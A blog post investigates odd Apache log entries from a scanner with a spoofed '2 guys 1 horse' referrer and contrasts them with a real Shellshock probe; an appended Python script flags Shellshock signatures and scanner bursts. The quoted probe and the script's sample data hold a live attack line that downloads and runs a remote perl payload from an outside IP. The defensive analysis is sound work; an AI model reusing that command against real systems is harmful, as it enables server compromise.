two guys one horse

A while ago, AWStats showed me that someone had reached my blog by searching for "2 guys 1 horse". At the time this just made me smile, and I assumed it was a search-engine mistake.

But this month, when I saw 3 different connections with the same search terms, I figured it had to be something else.

Searching for "horse" in Apache's logs, I found:

153.183.166.241 - - [14/Jul/2015:10:21:57 +0200] "GET /Ringing.at.your.dorbell! HTTP/1.0" 404 500 "http://google.com/search?q=2+guys+1+horse" "x00_-gawa.sa.pilipinas.2015"

153.183.166.241 - - [14/Jul/2015:10:22:00 +0200] "GET / HTTP/1.1" 200 10856 "http://google.com/search?q=2+guys+1+horse" "x00_-gawa.sa.pilipinas.2015"

A quick search for "Ringing.at.your.dorbell!" shows that many people have seen this in their logs, and some think it is a Shellshock attack, but I don't think that is true, and I will explain why.

As a (real) example, this is what an Apache log line looks like when someone tries to exploit Shellshock:

173.255.225.241 - - [13/Jul/2015:01:10:11 +0200] "GET /cgi-bin/test.cgi HTTP/1.0" 404 496 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://195.242.220.89/mc ; curl -O http://195.242.220.89/mc;perl mc;perl /var/tmp/mc""

We can clearly see () { :;}; which is typical of this attack (some variants exist), followed by a command sequence that downloads and executes remote code (be careful if you follow the link). The payload is placed in the User-Agent header because a CGI script receives it as the HTTP_USER_AGENT environment variable, and a vulnerable Bash runs whatever follows the function definition when it imports that variable.

But back to our horse. Obviously this does not look like the attack just described, but if we list all the connections from 153.183.166.241 we get:

153.183.166.241 - - [14/Jul/2015:10:21:57 +0200] "GET /Ringing.at.your.dorbell! HTTP/1.0" 404 500 "http://google.com/search?q=2+guys+1+horse" "x00_-gawa.sa.pilipinas.2015"

153.183.166.241 - - [14/Jul/2015:10:21:58 +0200] "GET / HTTP/1.0" 200 10819 "-" "x00_-gawa.sa.pilipinas.2015"

153.183.166.241 - - [14/Jul/2015:10:22:00 +0200] "GET / HTTP/1.1" 200 10856 "http://google.com/search?q=2+guys+1+horse" "x00_-gawa.sa.pilipinas.2015"

153.183.166.241 - - [14/Jul/2015:10:22:02 +0200] "GET /Diagnostics.asp HTTP/1.0" 404 491 "-" "x00_-gawa.sa.pilipinas.2015"

153.183.166.241 - - [14/Jul/2015:10:22:03 +0200] "GET / HTTP/1.0" 200 10819 "-" "x00_-gawa.sa.pilipinas.2015"

153.183.166.241 - - [14/Jul/2015:10:22:05 +0200] "GET / HTTP/1.0" 200 10819 "-" "x00_-gawa.sa.pilipinas.2015"

153.183.166.241 - - [14/Jul/2015:10:22:10 +0200] "GET / HTTP/1.0" 200 10819 "-" "x00_-gawa.sa.pilipinas.2015"

So I guess it is just a piece of software scanning IP addresses to find a specific system (a DD-WRT admin page?). But there are two things I don't understand:

Why load the same page three times, and why so little discretion?
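To tell the two kinds of traffic apart mechanically, here is a small log triage script, added as an example and not part of the original post. It parses Apache combined-format lines, flags the Shellshock signature () { in any field that a CGI script would see as an environment variable (path, Referer, User-Agent), and groups the remaining requests per source IP so a scanner's burst (a few probes for non-existent pages, repeated fetches of "/" with HTTP/1.0, a non-browser User-Agent, all within seconds) stands out. The sample lines are the ones quoted above; the function and variable names are my own.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache "combined" format:
# host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)

# Shellshock marker: a Bash function definition "() {" (optionally with
# whitespace) injected into a header that CGI exports into the environment.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

# Sample log lines copied from the post above (one Shellshock probe, then
# the seven requests from the "horse" scanner).
SAMPLE_LOG = [
    '173.255.225.241 - - [13/Jul/2015:01:10:11 +0200] "GET /cgi-bin/test.cgi HTTP/1.0" 404 496 "-" "() { :;}; /bin/bash -c "cd /var/tmp ; wget http://195.242.220.89/mc ; curl -O http://195.242.220.89/mc;perl mc;perl /var/tmp/mc""',
    '153.183.166.241 - - [14/Jul/2015:10:21:57 +0200] "GET /Ringing.at.your.dorbell! HTTP/1.0" 404 500 "http://google.com/search?q=2+guys+1+horse" "x00_-gawa.sa.pilipinas.2015"',
    '153.183.166.241 - - [14/Jul/2015:10:21:58 +0200] "GET / HTTP/1.0" 200 10819 "-" "x00_-gawa.sa.pilipinas.2015"',
    '153.183.166.241 - - [14/Jul/2015:10:22:00 +0200] "GET / HTTP/1.1" 200 10856 "http://google.com/search?q=2+guys+1+horse" "x00_-gawa.sa.pilipinas.2015"',
    '153.183.166.241 - - [14/Jul/2015:10:22:02 +0200] "GET /Diagnostics.asp HTTP/1.0" 404 491 "-" "x00_-gawa.sa.pilipinas.2015"',
    '153.183.166.241 - - [14/Jul/2015:10:22:03 +0200] "GET / HTTP/1.0" 200 10819 "-" "x00_-gawa.sa.pilipinas.2015"',
    '153.183.166.241 - - [14/Jul/2015:10:22:05 +0200] "GET / HTTP/1.0" 200 10819 "-" "x00_-gawa.sa.pilipinas.2015"',
    '153.183.166.241 - - [14/Jul/2015:10:22:10 +0200] "GET / HTTP/1.0" 200 10819 "-" "x00_-gawa.sa.pilipinas.2015"',
]


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_shellshock(entry):
    """True if the Shellshock function-definition prefix appears in an exported field."""
    return any(SHELLSHOCK_RE.search(entry[f]) for f in ("path", "referer", "ua"))


def analyse(lines):
    """Split parsed entries into Shellshock hits and a per-IP list of all requests."""
    flagged = []
    per_ip = defaultdict(list)
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        per_ip[entry["ip"]].append(entry)
        if is_shellshock(entry):
            flagged.append(entry)
    return flagged, dict(per_ip)


def summarize_ip(entries):
    """Features that separate a scanner burst from a human visit for one source IP."""
    times = [datetime.strptime(e["time"], "%d/%b/%Y:%H:%M:%S %z") for e in entries]
    return {
        "requests": len(entries),
        "distinct_paths": len({e["path"] for e in entries}),
        "not_found": sum(1 for e in entries if e["status"] == "404"),
        "http10": sum(1 for e in entries if e["proto"] == "HTTP/1.0"),
        "user_agents": sorted({e["ua"] for e in entries}),
        "span_seconds": int((max(times) - min(times)).total_seconds()),
        "shellshock": any(is_shellshock(e) for e in entries),
    }


if __name__ == "__main__":
    hits, by_ip = analyse(SAMPLE_LOG)
    for h in hits:
        print("SHELLSHOCK from", h["ip"], "in User-Agent:", h["ua"][:40], "...")
    for ip, entries in by_ip.items():
        print(ip, summarize_ip(entries))
```

The Shellshock line is the only one that trips SHELLSHOCK_RE; the 153.183.166.241 burst is recognised instead by its shape: 7 requests in 13 seconds, two 404s on unusual paths, almost everything over HTTP/1.0, and a User-Agent no browser sends.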

